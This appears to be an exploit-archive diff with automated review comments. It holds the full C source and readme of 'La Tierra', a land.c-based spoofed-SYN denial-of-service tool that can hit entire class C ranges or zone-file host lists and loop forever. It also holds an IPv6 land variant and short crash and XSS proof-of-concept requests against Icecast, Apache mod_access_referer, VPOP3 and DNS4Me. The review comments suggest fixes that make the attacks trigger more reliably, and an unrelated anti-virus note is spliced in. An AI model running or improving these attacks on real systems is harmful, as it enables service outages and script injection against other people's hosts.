hints.ai_flags = AI_PASSIVE;
retVal = getaddrinfo(argv[2],0, &hints, &addrinfo);
if ( retVal!=0 )
{
WSACleanup();
fprintf( stderr, "Error in getaddrinfo():%d\n",WSAGetLastError());
exit(EXIT_FAILURE);
}
//
// Open WinPCap adapter
//
if ( (pcap_handle = pcap_open_live (argv[1], 1514, PCAP_OPENFLAG_PROMISCUOUS, 100, (char*)errbuf)) == NULL )
{
freeaddrinfo(addrinfo);
WSACleanup();
fprintf(stderr, "Error opening device: %s\n",argv[1]);
return EXIT_FAILURE;
}
ZeroMemory(packet,sizeof(packet));
struct sockaddr_in6 *sa = (struct sockaddr_in6 *) addrinfo->ai_addr;
// fill ethernet header
eth_hdr->ether_dhost[0] = eth_hdr->ether_shost[0] = 0;// assume address like 00:something;
eth_hdr->ether_dhost[1] = eth_hdr->ether_shost[1] = sa->sin6_addr.u.Byte[9];
eth_hdr->ether_dhost[2] = eth_hdr->ether_shost[2] = sa->sin6_addr.u.Byte[10];
eth_hdr->ether_dhost[3] = eth_hdr->ether_shost[3] = sa->sin6_addr.u.Byte[13];
eth_hdr->ether_dhost[4] = eth_hdr->ether_shost[4] = sa->sin6_addr.u.Byte[14];
eth_hdr->ether_dhost[5] = eth_hdr->ether_shost[5] = sa->sin6_addr.u.Byte[15];
eth_hdr->ether_type = 0xdd86;
// fill IP header
// source ip == destination ip
memcpy(ip6_hdr->ip_src.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
memcpy(ip6_hdr->ip_dst.__u6_addr.__u6_addr8,sa->sin6_addr.u.Byte,sizeof(sa->sin6_addr.u.Byte));
ip6_hdr->ip_hl = 255;
ip6_hdr->ip_nh = IPPROTO_TCP;
ip6_hdr->ip_len = htons (20);
ip6_hdr->ip_flags[0] = 0x06 << 4;
srand((unsigned int) time(0));
// fill tcp header
tcp_hdr->th_sport = tcp_hdr->th_dport = htons (atoi(argv[3])); // source port equal to destination
tcp_hdr->th_seq = rand();
tcp_hdr->th_ack = rand();
tcp_hdr->th_off = htons(5);
tcp_hdr->th_win = rand();
tcp_hdr->th_sum = 0;
tcp_hdr->th_urp = htons(10);
tcp_hdr->th_off = 5;
tcp_hdr->th_flags = 2;
// calculate tcp checksum
int chsum = libnet_in_cksum ((u_int16_t *) & ip6_hdr->ip_src, 32);
chsum += ntohs (IPPROTO_TCP + sizeof (struct libnet_tcp_hdr));
chsum += libnet_in_cksum ((u_int16_t *) tcp_hdr, sizeof (struct libnet_tcp_hdr));
tcp_hdr->th_sum = LIBNET_CKSUM_CARRY (chsum);
// send data to wire
retVal = pcap_sendpacket (pcap_handle, (u_char *) packet, sizeof(packet));
if ( retVal == -1 )
{
fprintf(stderr,"Error writing packet to wire!!\n");
}
//
// close adapter, free mem.. etc..
//
pcap_close(pcap_handle);
freeaddrinfo(addrinfo);
WSACleanup();
return EXIT_SUCCESS;
}
--
NTBugtraq Editor's Note:
Most viruses these days use spoofed email addresses. As such, using an Anti-Virus product which automatically notifies the perceived sender of a message it believes is infected may well cause more harm than good. Someone who did not actually send you a virus may receive the notification and scramble their support staff to find an infection which never existed in the first place. Suggest such notifications be disabled by whomever is responsible for your AV, or at least that the idea is considered.
--
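Review bot: `tcp_hdr->th_off = htons(5)` is a dead store, overwritten by `tcp_hdr->th_off = 5` a few lines later, and `th_off` is a 4-bit field so a byte-swapped value is wrong there anyway; drop the first assignment. `srand((unsigned int) time(0))` relies on some other header to declare `time()`; include `<time.h>`. The NTBugtraq editor's note on anti-virus sender notifications after the closing `--` is unrelated to this entry and should be trimmed from the exploit file.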

platforms/multiple/dos/20813.c Executable file

@ -0,0 +1,852 @@
source: http://www.securityfocus.com/bid/2666/info
A number of TCP/IP stacks are vulnerable to a "loopback" condition initiated by sending a TCP SYN packet with the source address and port spoofed to equal the destination source and port. When a packet of this sort is received, an infinite loop is initiated and the affected system halts. This is known to affect Windows 95, Windows NT 4.0 up to SP3, Windows Server 2003, Windows XP SP2, Cisco IOS devices & Catalyst switches, and HP-UX up to 11.00.
It is noted that on Windows Server 2003 and XP SP2, the TCP and IP checksums must be correct to trigger the issue.
**Update: It is reported that Microsoft platforms are also prone to this vulnerability. The vendor reports that network routers may not route malformed TCP/IP packets used to exploit this issue. As a result, an attacker may have to discover a suitable route to a target computer, or reside on the target network segment itself before exploitation is possible.
/**************************************************************/
/* */
/* La Tierra v1.0b - by MondoMan (KeG), elmondo@usa.net */
/* */
/* Modified version of land.c by m3lt, FLC */
/* */
/* Compiled on RedHat Linux 2.0.27, Intel Pentium 200Mhz */
/* gcc version 2.7.2.1 tabs set to 3 */
/* */
/* gcc latierra.c -o latierra */
/* */
/* Refer to readme.txt for more details and history */
/* */
/**************************************************************/
#include <stdio.h>
#include <getopt.h>
#include <string.h>
#include <netdb.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/ip.h>
#include <netinet/ip_tcp.h>
#include <netinet/protocols.h>
#define DEFAULT_FREQUENCY 1
#define TRUE 1
#define FALSE 0
#define FOR_EVER -5
#define LIST_FILE 1
#define ZONE_FILE 2
#define MAXLINELENGTH 512
#define DEFAULT_SEQ 0xF1C
#define DEFAULT_TTL 0xFF
#define DEFAULT_TCPFLAGS (TH_SYN | TH_PUSH)
#define DEFAULT_WINSIZE 0xFDE8
struct pseudohdr
{
struct in_addr saddr;
struct in_addr daddr;
u_char zero;
u_char protocol;
u_short length;
struct tcphdr tcpheader;
};
typedef struct latierra_data
{
char dest_ip[256];
int tcp_flags;
int window_size;
int ip_protocol;
int sequence_number;
int ttl;
int supress_output;
int message_type;
} LATIERRA_DATA;
void alternatives(void);
int get_ip(int use_file, FILE *fp, char *buff);
int land(LATIERRA_DATA *ld, int port_number);
void nslookup_help(void);
void print_arguments(void);
void protocol_list(void);
/********/
/* main */
/********/
int main(int argc, char **argv)
{
FILE *fp;
LATIERRA_DATA ld;
int frequency = DEFAULT_FREQUENCY, x;
int beginning_port=1, octet=1, scan_loop=0, loop_val=0, use_file=FALSE;
int ending_port = 0, loop = TRUE, i = 0, increment_addr = FALSE;
char got_ip = FALSE, got_beg_port = FALSE;
char class_c_addr[21], filename[256], buff[512], valid_tcp_flags[16];
printf("\nlatierra v1.0b by MondoMan (elmondo@usa.net), KeG\n");
printf("Enhanced version of land.c originally developed by m3lt, FLC\n");
strcpy(valid_tcp_flags, "fsrpau");
ld.tcp_flags = 0;
ld.window_size = DEFAULT_WINSIZE;
ld.ip_protocol = IP_TCP;
ld.sequence_number = DEFAULT_SEQ;
ld.ttl = DEFAULT_TTL;
ld.message_type = 0;
if(argc > 1 && (!strcmp(argv[1], "-a")))
alternatives();
if(argc > 1 && (!strcmp(argv[1], "-n")))
nslookup_help();
if(argc > 1 && (!strcmp(argv[1], "-p")))
protocol_list();
if(argc == 1 || ( (argc >= 2) && (!strcmp(argv[1], "-h"))))
print_arguments();
while((i = getopt(argc, argv, "i:b:e:s:l:o:t:w:p:q:v:m:")) != EOF)
{
switch(i)
{
case 't':
for(x=0;x<strlen(optarg);x++)
switch(optarg[x])
{
case 'f': /* fin */
ld.tcp_flags |= TH_FIN;
break;
case 's': /* syn */
ld.tcp_flags |= TH_SYN;
break;
case 'r': /* reset */
ld.tcp_flags |= TH_RST;
break;
case 'p': /* push */
ld.tcp_flags |= TH_PUSH;
break;
case 'a': /* ack */
ld.tcp_flags |= TH_ACK;
break;
case 'u': /* urgent */
ld.tcp_flags |= TH_URG;
break;
default:
printf("\nERROR: Invalid option specified [ %c ] for tcp_flags.\n\n", optarg[x]);
return(-12);
break;
}
break;
case 'q':
ld.sequence_number = atoi(optarg);
break;
case 'w':
ld.window_size = atoi(optarg);
break;
case 'm':
ld.message_type = atoi(optarg);
break;
case 'v':
ld.ttl = atoi(optarg);
break;
case 'p':
ld.ip_protocol = atoi(optarg);
break;
case 'o':
ld.supress_output = TRUE;
break;
case 'i':
if(strlen(optarg) > 1)
strcpy(ld.dest_ip, optarg);
else
{
printf("ERROR: Must specify valid IP or hostname.\n");
return(-6);
}
got_ip = TRUE;
break;
case 's':
frequency = atoi(optarg);
break;
case 'l':
loop = atoi(optarg);
break;
case 'b':
beginning_port = atoi(optarg);
got_beg_port = TRUE;
break;
case 'e':
ending_port = atoi(optarg);
break;
}
}
if(!ld.tcp_flags)
ld.tcp_flags = DEFAULT_TCPFLAGS;
if(!got_beg_port)
{
fprintf(stderr, "\nMust specify beginning port number. Use -h for help with arguments.\n\n");
return(-7);
}
if(ending_port == 0)
ending_port = beginning_port;
printf("\nSettings:\n\n");
printf(" (-i) Dest. IP Addr : ");
if(ld.dest_ip[strlen(ld.dest_ip) -1] == '-')
{
ld.dest_ip[strlen(ld.dest_ip)-1] = 0x0;
strcpy(class_c_addr, ld.dest_ip);
strcat(ld.dest_ip, "1");
printf(" %s (Class C range specified).\n", ld.dest_ip);
increment_addr = TRUE;
octet = 1;
}
else
if(strlen(ld.dest_ip) > 5)
{
if(strncmp(ld.dest_ip, "zone=", 5)==0)
{
strcpy(filename, &ld.dest_ip[5]);
printf("%s (using DNS zone file)\n", filename);
use_file = ZONE_FILE;
}
else if(strncmp(ld.dest_ip, "list=", 5) == 0)
{
strcpy(filename, &ld.dest_ip[5]);
printf("%s (using ASCII list)\n", filename);
use_file = LIST_FILE;
}
else
printf("%s\n", ld.dest_ip);
}
else
{
printf("Destination specifier (%s) length must be > 7.\n", ld.dest_ip);
return(-9);
}
printf(" (-b) Beginning Port #: %d\n", beginning_port );
printf(" (-e) Ending Port # : %d\n", ending_port );
printf(" (-s) Seconds to Pause: %d\n", frequency );
printf(" (-l) Loop : %d %s\n", loop, (loop == FOR_EVER) ? "(forever)" : " " );
printf(" (-w) Window size : %d\n", ld.window_size );
printf(" (-q) Sequence Number : %X (%d)\n",ld.sequence_number, ld.sequence_number );
printf(" (-v) Time-to-Live : %d\n", ld.ttl);
printf(" (-p) IP Protocol # : %d\n", ld.ip_protocol );
printf(" (-t) TCP flags : ");
strcpy(buff, "");
if( ld.tcp_flags & TH_FIN)
strcat(buff, "fin ");
if( ld.tcp_flags & TH_SYN)
strcat(buff, "syn ");
if(ld.tcp_flags & TH_RST)
strcat(buff, "rst ");
if(ld.tcp_flags & TH_PUSH)
strcat(buff, "push ");
if(ld.tcp_flags & TH_ACK)
strcat(buff, "ack ");
if(ld.tcp_flags & TH_URG)
strcat(buff, "urg ");
printf("%s\n\n", buff);
if(ending_port < beginning_port)
{
printf("\nERROR: Ending port # must be greater than beginning port #\n\n");
return(-8);
}
scan_loop = loop_val = loop;
if(use_file)
{
if(access(filename, 0))
{
printf("\nERROR: The file you specified (%s) cannot be found.\n\n", filename);
return(-9);
}
if( (fp = fopen(filename, "rt")) == NULL)
{
printf("ERROR: Unable to open %s.\n", filename);
return(-10);
}
if(!get_ip(use_file, fp, buff))
{
printf("Unable to get any IP address from file %s.\n");
return(-11);
}
strcpy(ld.dest_ip, buff);
}
while( (loop == FOR_EVER) ? 1 : loop-- > 0)
{
for(i=beginning_port; i <= ending_port; i++)
{
if(land(&ld, i)) /* go for it BaBy! */
break;
if(frequency) /* make sure freq > 0 */
{
if(!ld.supress_output)
printf("-> paused %d seconds.\n", frequency);
sleep(frequency);
}
}
if( (!use_file) && (loop && increment_addr) )
{
char temp_addr[21];
if(++octet > 254) /* check for reset */
{
if(loop_val != FOR_EVER) /* make sure not to distrute forever! */
{
if(++scan_loop > loop_val) /* check if scanned x times */
break;
else
loop = loop_val; /* restore original value */
}
octet = 1; /* reset */
}
sprintf(temp_addr, "%s%d", class_c_addr, octet);
strcpy(ld.dest_ip, temp_addr);
if(!ld.supress_output)
printf("** incrementing to next IP address: %s\n", ld.dest_ip);
if(scan_loop > loop_val)
break; /* break while loop */
}
else if(use_file)
{
if(!get_ip(use_file, fp, buff))
break;
loop++;
strcpy(ld.dest_ip, buff);
}
} /* end while */
printf("\nDone.\n\n");
} /* end main */
int get_ip(int use_file, FILE *fp, char *buff)
{
if(use_file == LIST_FILE)
return(get_ip_from_list(fp, buff));
return(get_ip_from_zone(fp, buff));
}
int get_ip_from_list(FILE *fp, char *buff)
{
int ret_val;
while(1)
{
ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
if((ret_val == EOF) || (ret_val == (int)NULL))
return 0;
if( strlen(buff) >= 7)
if((buff[0] != ';') && (buff[0] != '['))
{
if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
buff[strlen(buff)-1] = 0x0;
return 1;
}
}
return 0;
}
int get_ip_from_zone(FILE *fp, char *buff)
{
int ret_val, i;
char *p, delim[8];
strcpy(delim, " \t");
while(1)
{
ret_val = (int)fgets(buff, MAXLINELENGTH, fp);
if((ret_val == EOF) || (ret_val == (int)NULL))
return 0;
if( strlen(buff) >= 7)
if((buff[0] != ';') && (buff[0] != '[') && (strncmp(buff, "ls -d", 5) != 0))
{
if( (p = strtok( buff, delim)) == NULL)
continue;
if( (p = strtok(NULL, delim)) == NULL)
continue;
if(strcmp(p, "A")) /* be sure second column is an DNS A record */
continue;
if( (p = strtok(NULL, delim)) == NULL)
continue;
strcpy(buff, p);
/* verify that we have a valid IP address to work with */
if(inet_addr(p) == -1)
continue;
/* strip off training line characters */
if( (buff[strlen(buff)-1] == '\r') || (buff[strlen(buff)-1] == '\n') )
buff[strlen(buff)-1] = 0x0;
return 1;
}
}
return 0;
}
/************/
/* checksum */
/************/
u_short checksum(u_short * data,u_short length)
{
register long value;
u_short i;
for(i = 0; i< (length >> 1); i++)
value += data[i];
if((length & 1)==1)
value += (data[i] << 8);
value = (value & 0xFFFF) + (value >> 16);
return(~value);
}
/********/
/* land */
/********/
int land(LATIERRA_DATA *ld, int port_number)
{
struct sockaddr_in sin;
int sock;
char buffer[40];
struct iphdr * ipheader = (struct iphdr *) buffer;
struct tcphdr * tcpheader=(struct tcphdr *) (buffer+sizeof(struct iphdr));
struct pseudohdr pseudoheader;
bzero(&sin,sizeof(struct sockaddr_in));
sin.sin_family=AF_INET;
if((sin.sin_addr.s_addr=inet_addr(ld->dest_ip))==-1)
{
printf("ERROR: unknown host %s\n", ld->dest_ip);
return(-1);
}
if((sin.sin_port=htons(port_number))==0)
{
printf("ERROR: unknown port %s\n",port_number);
return(-2);
}
if((sock=socket(AF_INET,SOCK_RAW,255))==-1)
{
printf("ERROR: couldn't allocate raw socket\n");
return(-3);
}
bzero(&buffer,sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->version=4;
ipheader->ihl=sizeof(struct iphdr)/4;
ipheader->tot_len=htons(sizeof(struct iphdr)+sizeof(struct tcphdr));
ipheader->id=htons(ld->sequence_number);
ipheader->ttl = ld->ttl;
ipheader->protocol = ld->ip_protocol;
ipheader->saddr=sin.sin_addr.s_addr;
ipheader->daddr=sin.sin_addr.s_addr;
tcpheader->th_sport = sin.sin_port;
tcpheader->th_dport = sin.sin_port;
tcpheader->th_seq = htonl(ld->sequence_number);
tcpheader->th_flags = ld->tcp_flags;
tcpheader->th_off = sizeof(struct tcphdr)/4;
tcpheader->th_win = htons(ld->window_size);
bzero(&pseudoheader,12+sizeof(struct tcphdr));
pseudoheader.saddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.daddr.s_addr=sin.sin_addr.s_addr;
pseudoheader.protocol = ld->ip_protocol;
pseudoheader.length = htons(sizeof(struct tcphdr));
bcopy((char *) tcpheader,(char *) &pseudoheader.tcpheader,sizeof(struct tcphdr));
tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));
if( sendto(sock, buffer,
sizeof(struct iphdr)+sizeof(struct tcphdr),
ld->message_type,
(struct sockaddr *) &sin,
sizeof(struct sockaddr_in) )==-1)
{
printf("ERROR: can't send packet. (sendto failed)\n");
return(-4);
}
if(!ld->supress_output)
printf("-> packet successfully sent to: %s:%d\n", ld->dest_ip, port_number);
close(sock);
return(0);
}
/* End of land */
void alternatives()
{
printf("\nAlternative command line arguments for option -i\n\n");
printf(" You can create two types of files that latierra can use to get\n");
printf(" a list of IP addresses, a simple ASCII file with each IP address\n");
printf(" appearing on each line or better yet, a DNS zone file created by\n");
printf(" nslookup. If you are unfamiliar with nslookup, specify a '-n' on the\n");
printf(" command line of latierra.\n\n");
printf(" Basically, latierra will walk down the list and send the spoofed packet\n");
printf(" to each IP address. Once the list is complete, and loop > 1, the list\n");
printf(" is repeated. To specify that the '-i' option should use a zone file,\n");
printf(" specify \"zone=filename.txt\" instead of an IP address. To specify a \n");
printf(" simple ASCII list of IP addresses, use \"list=filename.txt\". Lines\n");
printf(" beginning with ';' or '[' are ignored. Lines that are not an 'A' \n");
printf(" record (second column)in a zone file will ignored.\n\n");
exit(-1);
}
void nslookup_help()
{
printf("\nNSLOOKUP help\n\n");
printf("To see who is the DNS server for a particular domain, issue the following:\n");
printf(" > set type=ns\n");
printf(" > xyz.com\n\n");
printf(" You will see a list of the name server(s) if completed successfully\n\n");
printf("To get a list of all the DNS entries for a particular domain, run nslookup\n");
printf("and issue the following commands:\n");
printf(" > server 1.1.1.1\n");
printf(" > ls -d xyz.com > filename.txt\n\n");
printf("Line 1 sets the server that nslookup will use to resolve a name.\n");
printf("Line 2 requires all the information about xyz.com be written to filename.txt\n\n");
exit(-1);
}
void protocol_list()
{
printf("\nProtocol List:\n\n");
printf("Verified:\n");
printf("1-ICMP 2-IGMP 3-GGP 5-ST 6-TCP 7-UCL 8-EGP 9-IGP 10-BBN_RCC_MON\n");
printf("11-NVP11 13-ARGUS 14-EMCON 15-XNET 16-CHAOS 17-UDP 18-MUX\n");
printf("19-DCN_MEAS 20-HMP 21-PRM 22-XNS_IDP 23-TRUNK1 24-TRUNK2\n");
printf("25-LEAF1 26-LEAF2 27-RDP 28-IRTP 29-ISO_TP4 30-NETBLT\n");
printf("31-MFE_NSP 32-MERIT_INP 33-SEP 34-3PC 62-CFTP 64-SAT_EXPAK\n");
printf("66-RVD 67-IPPC 69-SAT_MON 70-VISA 71-IPCV\n");
printf("76-BR_SAT_MON 77-SUN_ND 78-WB_MON 79-WB_EXPAK 80-ISO_IP\n");
printf("81-VMTP 82-SECURE_VMTP 83-VINES 84-TTP 85-NSFNET_IGP 86-DGP\n");
printf("87-TCF 88-IGRP 89-OSPFIGP 90-SPRITE_RPG 91-LARP\n\n");
printf("Supported:\n");
printf(" 6-TCP 17-UDP (future: PPTP, SKIP) \n\n");
exit(-1);
}
void print_arguments()
{
printf("Arguments: \n");
printf(" * -i dest_ip = destination ip address such as 1.1.1.1\n");
printf(" If last octet is '-', then the address will increment\n");
printf(" from 1 to 254 (Class C) on the next loop\n");
printf(" and loop must be > 1 or %d (forever).\n", FOR_EVER);
printf(" Alternatives = zone=filename.txt or list=filename.txt (ASCII)\n");
printf(" For list of alternative options, use -a instead of -h.\n");
printf(" * -b port# = beginning port number (required).\n");
printf(" -e port# = ending port number (optional)\n");
printf(" -t = tcp flag options (f=fin,~s=syn,r=reset,~p=push,a=ack,u=urgent)\n");
printf(" -v = time_to_live value, default=%d\n", DEFAULT_TTL);
printf(" -p protocol = ~6=tcp, 17=udp, use -p option for complete list\n");
printf(" -w window_size = value from 0 to ?, default=%d\n", DEFAULT_WINSIZE);
printf(" -q tcp_sequence_number, default=%d\n", DEFAULT_SEQ);
printf(" -m message_type (~0=none,1=Out-Of-Band,4=Msg_DontRoute\n");
printf(" -s seconds = delay between port numbers, default=%d\n", DEFAULT_FREQUENCY);
printf(" -o 1 = supress additional output to screen, default=0\n" );
printf(" -l loop = times to loop through ports/scan, default=%d, %d=forever\n", 1, FOR_EVER);
printf(" * = required ~ = default parameter values\n\n");
exit(-1);
}
/* End of file */
----------------- readme.txt ------------------------------
La Tierra v1.0b - by MondoMan (KeG), elmondo@usa.net
Modified version of land.c by m3lt, FLC
To compile latierra, type:
gcc latierra.c -o latierra
To see the help screen, use 'latierra -h'
This program crashes Windows 95, and will cause Windows NT
4.0, SP3 to utilize a high percentage of CPU. In some
instances, CPU usage reaches %100.
land.c description:
land.c sends a spoofed packet with the SYN flag from the
the same IP and port number as the destination. For
example, if you want to do a DoS on 1.1.1.1, port 80, it would
spoof 1.1.1.1 port 80 as the source. The problem is with
NT4 SP3, however, is once you issue this packet to a
port, NT4 SP3 appears to ignore all other attempts -
UNTIL ...
La Tierra!
La Tierra description:
La Tierra basically works by sending NT the same packet
used in land.c but to more than one port (if specified).
It doesn't appear to matter if the port is opened or closed!
NT doesn't appear to let this happen again on the same port
successively, but you simply change ports, and you can easily
go back to the original port and it'll work again. What's even
more interesting is the fact that port 139 works with this.
You would have thought - I'll leave that alone for now!
While testing, I used a Compaq dual Intel Pentium Pro 200, and
was able to take up to %64 CPU. With one processor disabled,
CPU usage was %100. NT4 SP3 doesn't seem to crash, just needs
time to recover, even with one spoofed packet.
Features include:
- Ability to launch a DoS on an entire class C address
- Specify the beginning and ending port range
- Specify the number of loops or make it loop forever!
- User defined TCP flags: fin, syn, reset, push, ack,
and urgent
- Other IP options such as window size, time-to-live,
sequence_number, and message_type
- Ability to read a DNS zone file for IP addresses
- Ability to read a ASCII file containing IP addresses
Command line options:
- i ip_address
DEFAULT: None
RANGE: Valid IP Address
OPTIONAL: No
where ip_address is a valid ip_address, or if you wish to
cycle through a class C address, the last octet is dropped
and replaced with a '-'. This option is required. The
source and destination address are obtained from this value.
Rather than specifying an IP address, you may wish to create
an ASCII file, or better yet, use nslookup to obtain all
zone information for a particular domain. The ASCII file
simply contains a list of IP addresses, one on each line.
To get a DNS file, simply use nslookup, and the
"ls -d somedomain.com > filename.txt" command. You can use
'latierra -n' to read more about the command sequence for
nslookup.
In both types of files, lines that begin with ';' or '[' are
ignored. In DNS files, only 'A' records are processed.
Examples:
Single IP Address:
-i 10.1.2.1
Class C range:
-i 10.1.2.-
ASCII file:
-i list=filename.txt
DNS file:
-i zone=filename.txt
-b beginning_port_number
DEFAULT: None
RANGE: Positive Integer
OPTIONAL: No
where this value is the port_number that latierra will use. If
no ending_port_number is specified, ending_port_number is then
equal to this value. Valid range is 1 to 0xFFFF
-e ending_port_number
DEFAULT: If not specified, equal to beginning_port_number
RANGE: Positive Integer
OPTIONAL: Yes
is the highest port number in the range to cycle through.
Example:
-i 10.1.2.1 -b 23 -e 80
will start at port 23 and increment up to port 80. You can
delay the next increment by using the -s option. Valid range
is 1 to 0xFFFF
-s seconds_between_spoofs
DEFAULT: 1
RANGE: Positive Integer
OPTIONAL: Yes
You may want to control the seconds between spoofs. If you
specify a zero, no delays occur.
In the below example, the spoof will between ports 23 and 80,
every 3 seconds.
-i 10.1.2.1 -b 23 -e 80 -s 3
-l number_of_loops
DEFAULT: 1
RANGE: Positive Integer, -5 loops forever
OPTIONAL: Yes
This option if set greater than 1, will cause a repeat of the
cycle. For example:
-i 10.1.2.1 -b 23 -e 80 -s 0 -l 8
will cause latierra to go through ports 23 through 80 and
repeat the process 8 times, with no delay. Look at the
following example:
-i 10.1.2.- -b 23 -e 80 -s 0 -l 8
latierra will start at 10.1.2.1, port 23 through 80, then
increment to 10.1.2.2, port 23 through 80, and so on until
it gets to 10.1.2.254, in which case it will repeat the
same procedure over again 8 times.
By specifying a value of -5 for this option, latierra will
loop forever, until you manually stop the process. In the
last example above, the procedure would never end. When it
reaches 10.1.2.254, it falls back to 10.1.2.1 and start
over again from there.
Other examples:
-i 10.1.2.1 -b 139 -s 0 -l -5
-i 10.1.2.- -b 80 -s 5 -l 10
-t tcp_flags
DEFAULT: sp (SYN, PUSH)
RANGE: valid character set (see below)
OPTIONAL: Yes
this option sets the various TCP flags, which include:
f = fin s = syn r = reset
p = push a = ack u = urgent
Example:
-i 10.1.2.1 -b 139 -t apu -s 0
To set the ack, push, and urgent flag
-v time_to_live_value
DEFAULT: 0xFF (255 decimal)
RANGE: Positive Integer
OPTIONAL: Yes
Sets the time to live value.
-p protocol_value
DEFAULT: 6 (tcp)
RANGE: Positive Integer
OPTIONAL: Yes
Sets the protocol value in the IP header. To see a list of
available protocols, run "latierra -p".
-w window_size_value
DEFAULT: 0xFFFF (65000 decimal)
RANGE: Positive long value
OPTIONAL: Yes
-q tcp_sequence_number_value
DEFAULT: 0xF1C
RANGE: Positive integer
OPTIONAL: Yes
-o 1 supress_additional_output
DEFAULT: messages are printed for status
RANGE: None
OPTIONAL: Yes
If you don't want to see the messages during the process,
simply use this "-o 1" to turn them off.
Final Note:
Please use this program for in-house testing purposes only.
Just because your sending spoofed packets, doesn't mean you
can't be traced.
Good luck.
- MondoMan
elmondo@usa.net
-------------------- end of file -------------------------------
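Review bot: `checksum()` in the latierra.c hunk never initialises its accumulator (`register long value;`), so the value written by `tcpheader->th_sum = checksum((u_short *) &pseudoheader,12+sizeof(struct tcphdr));` starts from whatever is on the stack, and `ipheader->check` is never set at all; the hunk's own description says Windows Server 2003 and XP SP2 only trigger when both the TCP and IP checksums are correct, so as written the PoC reaches those targets only if the kernel fixes up the IP checksum on the `socket(AF_INET,SOCK_RAW,255)` socket and the stack garbage happens to be zero. Change the declaration to `register long value = 0;` and either compute the IP header checksum or state that the kernel fills it in. Smaller defects in the same hunk: `printf("ERROR: unknown port %s\n",port_number);` passes an `int` to `%s`, `printf("Unable to get any IP address from file %s.\n");` has no argument for its `%s`, `ld.supress_output` and `ld.dest_ip` are never initialised in `main` when `-o`/`-i` are absent, `ret_val = (int)fgets(buff, MAXLINELENGTH, fp);` truncates a pointer to `int`, and `sleep`, `close` and `access` are used without `<unistd.h>`. The readme also advertises `-p 17` (UDP) as supported, but `land()` always builds a TCP header regardless of `ld->ip_protocol`, so that option only changes the protocol byte.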

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/2933/info
Icecast is an open source audio-streaming server for both Unix and Microsoft Windows systems.
Icecast does not sufficiently sanitize user-supplied input, or sanely handle unexpected input. Upon receiving a request from a user for a file that ends with a slash or period, the server will crash. The behaviour occurs when the remote attacker adds an '/', '\' or '.' to the end the URL they craft to request the file. The request of an existing file is not necessary, as the Icecast server will fail regardless.
http://localhost:8000/file//
NOTE: File is interpreted by Icecast as the 'root' directory and anything after 'file/' indicates the file request. The character '/' triggers the denial of service.
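Review bot: the PoC covers only one of the three trailing characters the description names: `http://localhost:8000/file//` exercises the `/` case, and nothing shows the `\` or `.` variants; add `http://localhost:8000/file/.` and the backslash form, and say that `localhost:8000` is a placeholder for the target host and port. The NOTE line also reads as if `file` were a real directory name; since the description says the requested file need not exist, say plainly that any path segment followed by the trailing character works.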

View file

@ -0,0 +1,5 @@
source: http://www.securityfocus.com/bid/7375/info
A vulnerability has been reported for the mod_access_referer Apache module. The problem occurs when parsing invalid HTTP referer header fields. If this vulnerability were to be triggered, it may be possible to trigger a NULL pointer dereference, effectively causing Apache to segfault.
Referer: ://its-missing-http.com
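Review bot: the hunk records only the raw header line `Referer: ://its-missing-http.com` and neither a delivery method nor an affected version; add the request it belongs to, e.g. `curl -H 'Referer: ://its-missing-http.com' http://target/`, and record which mod_access_referer releases were tested, since the description itself only says a NULL pointer dereference "may be possible".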

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/8787/info
It has been reported that Medieval Total War may be prone to a denial of service vulnerability. The issue is caused when an attacker sends a malformed value for nickname consisting of 0 Unicode characters to the server during the initial authentication process. The exploitation of this issue results in the all users receiving a "Connection expired" message before leading to a crash of the server.
Successful exploitation of this issue may allow an attacker to cause the software to crash or hang.
Medieval Total War versions 1.1 and prior are reported to be prone to this vulnerability.
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/23231.zip

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/10782/info
It is reported that VPOP3 is reported prone to a remote denial of service vulnerability. This issue presents itself when an attacker issues a URI request containing a large value for the 'msglistlen' parameter to the web mail interface.
VPOP3 2.0.0k is reported prone to this issue, however, it is likely that other versions are affected as well.
http://www.example.com:5108/messagelist.html?auth=MDA4MDA2MTQ6MTI3LjAuMC4xOmRpbWl0cmlz&msgliststart=0&msglistlen=10&sortfield=date&sortorder=A
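Review bot: the request on the last line of the hunk does not exercise the condition the description names: it sends `msglistlen=10`, while the text says the crash needs "a large value for the 'msglistlen' parameter". Put a large value in the example and record how large was tested. The `auth=MDA4MDA2MTQ6MTI3LjAuMC4xOmRpbWl0cmlz` value is also a per-session token (it base64-decodes to an id, the client IP `127.0.0.1` and the user name `dimitris`), so the PoC only works after logging in and substituting your own; state that, along with the fact that `www.example.com:5108` is a placeholder.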

View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/11213/info
DNS4Me is reported to be susceptible to a denial of service vulnerability, and a cross-site scripting vulnerability. These vulnerabilities affect the built-in web server contained in the package.
The first vulnerability reportedly allows attackers to cause the web server to consume all available CPU resources, and eventually crash the application.
The second vulnerability is due to a failure of the application to properly sanitize user-supplied URI input. This issue could permit a remote attacker to create a malicious URI link that includes hostile HTML and script code. If this link were to be followed, the hostile code may be rendered in the web browser of the victim user. This would occur in the security context of the affected web site and may allow for theft of cookie-based authentication credentials or other attacks.
Although these vulnerabilities are reported to exist in version 3.0.0.4 of DNS4Me, other versions may also be affected.
http://www.example.com/?%3E%3Cscript%3Ealert('XSS')%3C/script%3E
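Review bot: the hunk claims two issues but documents one: the only PoC line, `http://www.example.com/?%3E%3Cscript%3Ealert('XSS')%3C/script%3E`, demonstrates the reflected XSS, while the CPU-exhaustion denial of service described in the second paragraph has no trigger at all. Either add the request that drives the built-in web server to full CPU or scope the description to the XSS. It would also help to say that the leading `%3E` (`>`) is presumably there to close the tag the server reflects the query string into, since that is what makes the injected `<script>` render.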

View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/13712/info
